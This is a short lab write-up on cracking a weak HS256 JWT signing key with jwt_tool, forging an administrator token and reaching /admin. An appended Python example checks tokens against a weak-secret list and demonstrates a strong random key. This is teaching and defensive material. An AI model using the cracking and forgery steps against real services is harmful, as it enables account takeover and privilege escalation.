Lab 3 - Weak Signing Key

Some signing algorithms, such as HS256 (HMAC + SHA-256), use an arbitrary, standalone string as the secret key. As a result, the key can be easily guessed or brute-forced.

Log in with the given credentials.

Grab the JWT Token from the session key

We will use jwt_tool to crack the secret key, using -C to crack the key and -d to specify the dictionary.

The secret key is: secret1

Now we change the sub parameter to administrator and sign the JWT Token with the secret key, using -S to specify the algorithm and -p to specify the key.

Replace the session with the newly generated Token, and we can access /admin.
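Why the lab works, and the fix, as an added example that is not part of the original write-up: an HS256 signature is just HMAC-SHA256 over `header.payload`, so anyone holding a token can test candidate keys offline. The sketch below audits a service's own token against a short weak-secret list and shows a randomly generated 256-bit key as the replacement. The function names, the word list and the `wiener` claim are constructed for illustration; only `secret1` comes from the lab.

```python
import base64, hashlib, hmac, json, secrets

def b64url(data):
    # JWTs use unpadded URL-safe base64
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def sign_hs256(claims, key):
    # Build header.payload and append HMAC-SHA256(key, header.payload)
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    signing_input = header + "." + payload
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)

def audit_secret(token, weak_secrets):
    """Return the listed secret that signed `token`, or None if none match."""
    signing_input, _, sig_b64 = token.rpartition(".")
    sig = base64.urlsafe_b64decode(sig_b64 + "=" * (-len(sig_b64) % 4))
    for candidate in weak_secrets:
        expected = hmac.new(candidate.encode(), signing_input.encode(),
                            hashlib.sha256).digest()
        if hmac.compare_digest(expected, sig):
            return candidate
    return None

def strong_key():
    # 32 bytes from the OS CSPRNG, matching the SHA-256 output size
    return secrets.token_bytes(32)

# Constructed sample data (not captured from the lab)
WEAK_LIST = ["password", "changeme", "secret", "secret1"]
CLAIMS = {"sub": "wiener"}
WEAK_TOKEN = sign_hs256(CLAIMS, b"secret1")        # key found in this lab
STRONG_TOKEN = sign_hs256(CLAIMS, strong_key())    # hardened alternative

if __name__ == "__main__":
    print("weak token key:  ", audit_secret(WEAK_TOKEN, WEAK_LIST))
    print("strong token key:", audit_secret(STRONG_TOKEN, WEAK_LIST))
```

A token signed with the random key cannot be matched by any dictionary, which is the property the lab's `secret1` key lacks.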
